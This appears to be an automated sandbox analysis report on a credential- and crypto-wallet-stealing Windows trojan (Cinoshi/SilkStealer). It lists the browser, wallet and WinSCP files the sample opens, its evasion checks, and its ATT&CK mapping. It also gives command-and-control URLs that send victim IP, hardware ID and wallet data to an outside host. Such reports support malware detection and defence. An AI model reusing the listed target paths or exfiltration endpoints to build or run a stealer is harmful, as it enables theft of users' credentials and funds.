        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596644Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596516Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596406Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596297Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596188Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596078Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595969Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595859Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595640Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595531Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595422Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595312Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595203Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595092Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594984Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594656Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594547Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594438Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599656Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599217Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599109Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598891Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598641Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598530Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598394Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598266Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598153Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597876Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597734Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597613Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595625Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595516Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595405Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595297Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595186Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595076Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594964Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594859Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594639Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594531Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594421Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594309Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594201Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594094Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593984Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593873Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593719Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593590Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593483Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593375Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593265Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593156Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593047Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592937Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592828Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592718Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592609Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592500Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592390Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592281Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592170Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592061Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591953Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591844Jump to behavior
        Source: LnSNtO8JIa.exe, 00000000.00000002.3357143512.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, Chrome.exe, 00000005.00000002.3360224564.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_01085D94 LdrInitializeThunk,0_2_01085D94
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D86FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D86FD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D8CA8 OutputDebugStringA,GetLastError,_free,_free,SetLastError,SetLastError,_abort,0_2_6C3D8CA8
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D6E94 mov eax, dword ptr fs:[00000030h]0_2_6C3D6E94
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C415E10 OutputDebugStringA,OutputDebugStringA,GetProcessHeap,OutputDebugStringA,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,GetModuleFileNameW,OutputDebugStringA,GetLastError,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,StrongNameSignatureVerificationEx,OutputDebugStringA,OutputDebugStringA,StrongNameTokenFromAssembly,OutputDebugStringA,StrongNameErrorInfo,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,SetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,StrongNameFreeBuffer,HeapFree,OutputDebugStringA,0_2_6C415E10
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D86FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D86FD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1B0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D1B0A
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D11CD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C3D11CD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1CEB cpuid 0_2_6C3D1CEB
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Users\user\Desktop\LnSNtO8JIa.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Users\user\Desktop\System.Data.SQLite.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1A27 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6C3D1A27
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DA081 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_6C3DA081
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected Cinoshi Stealer
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 37504C8ot find a part of the path 'C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets'.veldb'.e__0.indexeddb.leveldb'.\amkmjjmmflddogmhpjloimipbofnfjih'.
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
        Source: Yara matchFile source: 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Cinoshi Stealer
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C416640 GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,0_2_6C416640

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts131
        Windows Management Instrumentation        		2
        Registry Run Keys / Startup Folder        		1
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
        Default Accounts2
        Command and Scripting Interpreter        		Boot or Logon Initialization Scripts2
        Registry Run Keys / Startup Folder        		1
        Deobfuscate/Decode Files or Information        		1
        Credentials in Registry        		2
        File and Directory Discovery        		Remote Desktop Protocol3
        Data from Local System        		Exfiltration Over Bluetooth21
        Encrypted Channel        		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager45
        System Information Discovery        		SMB/Windows Admin Shares1
        Screen Capture        		Automated Exfiltration4
        Non-Application Layer Protocol        		Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook1
        Timestomp        		NTDS1
        Query Registry        		Distributed Component Object Model1
        Clipboard Data        		Traffic Duplication5
        Application Layer Protocol        		Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading        		LSA Secrets261
        Security Software Discovery        		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Process Discovery        		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Process Injection        		DCSync141
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery        		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        LnSNtO8JIa.exe61%ReversingLabsByteCode-MSIL.Trojan.SilkStealer
        LnSNtO8JIa.exe100%AviraHEUR/AGEN.1307175
        LnSNtO8JIa.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe100%AviraHEUR/AGEN.1307175
        C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe61%ReversingLabsByteCode-MSIL.Trojan.SilkStealer
        C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe60%VirustotalBrowse
        C:\Users\user\Desktop\System.Data.SQLite.EF6.dll0%ReversingLabs
        C:\Users\user\Desktop\System.Data.SQLite.EF6.dll0%VirustotalBrowse
        C:\Users\user\Desktop\System.Data.SQLite.Linq.dll0%ReversingLabs
        C:\Users\user\Desktop\System.Data.SQLite.Linq.dll0%VirustotalBrowse
        C:\Users\user\Desktop\System.Data.SQLite.dll0%ReversingLabs
        C:\Users\user\Desktop\System.Data.SQLite.dll0%VirustotalBrowse
        C:\Users\user\Desktop\x64\SQLite.Interop.dll0%ReversingLabs
        C:\Users\user\Desktop\x64\SQLite.Interop.dll0%VirustotalBrowse
        C:\Users\user\Desktop\x86\SQLite.Interop.dll0%ReversingLabs
        C:\Users\user\Desktop\x86\SQLite.Interop.dll0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        ipwho.is0%VirustotalBrowse
        central-cee-doja.ru15%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://cdn.discordapp.com8Q0%Avira URL Cloudsafe
        https://central-cee-doja.ru//list.php?id=1081100%Avira URL Cloudmalware
        https://ipwho.is/?output=xml0%Avira URL Cloudsafe
        https://central-cee-doja.ru/dlls/System.Data.SQLite.dll0%Avira URL Cloudsafe
        https://ipwho.is/?output=xml0o0%Avira URL Cloudsafe
        https://central-cee-doja.ru/dlls/System.Data.SQLite.dll0%VirustotalBrowse
        http://central-cee-doja.rud0%Avira URL Cloudsafe
        https://ipwho.is/?output=xml0%VirustotalBrowse
        https://central-cee-doja.ru/getwallet.php?id=1081&wallet=btc100%Avira URL Cloudmalware
        https://central-cee-doja.ru/100%Avira URL Cloudmalware
        https://cdn.discordappD0%Avira URL Cloudsafe
        https://central-cee-doja.ru/dlls/x64/SQLite.Interop.dll100%Avira URL Cloudmalware
        https://central-cee-doja.ru/getwallet.php?id=1081&wallet=eth100%Avira URL Cloudmalware
        https://central-cee-doja.ru//dd.php?id=1081100%Avira URL Cloudmalware
        https://urn.to/r/sds_seeaCould0%Avira URL Cloudsafe
        https://central-cee-doja.ru/getwallet.php?id=1081&wallet=xmr100%Avira URL Cloudmalware
        https://central-cee-doja.ru/dlls/System.Data.SQLite.Linq.dll0%Avira URL Cloudsafe
        https://central-cee-doja.ru/dlls/x64/SQLite.Interop.dll0%VirustotalBrowse
        https://central-cee-doja.ru8Q0%Avira URL Cloudsafe
        https://central-cee-doja.ru/online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081100%Avira URL Cloudmalware
        https://central-cee-doja.ru/dlls/System.Data.SQLite.Linq.dll0%VirustotalBrowse
        https://central-cee-doja.ru100%Avira URL Cloudmalware
        https://central-cee-doja.ru//ferr.php?id=1081100%Avira URL Cloudmalware
        https://central-cee-doja.ru/online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-100%Avira URL Cloudmalware
        https://central-cee-doja.ru/dlls/x86/SQLite.Interop.dll100%Avira URL Cloudmalware
        https://urn.to/r/sds_seeaCould0%VirustotalBrowse
        https://central-cee-doja.ru/16%VirustotalBrowse
        http://central-cee-doja.ru100%Avira URL Cloudmalware
        https://central-cee-doja.ru//list.php?idh100%Avira URL Cloudmalware
        https://urn.to/r/sds_see0%Avira URL Cloudsafe
        https://central-cee-doja.ru/dlls/x86/SQLite.Interop.dll0%VirustotalBrowse
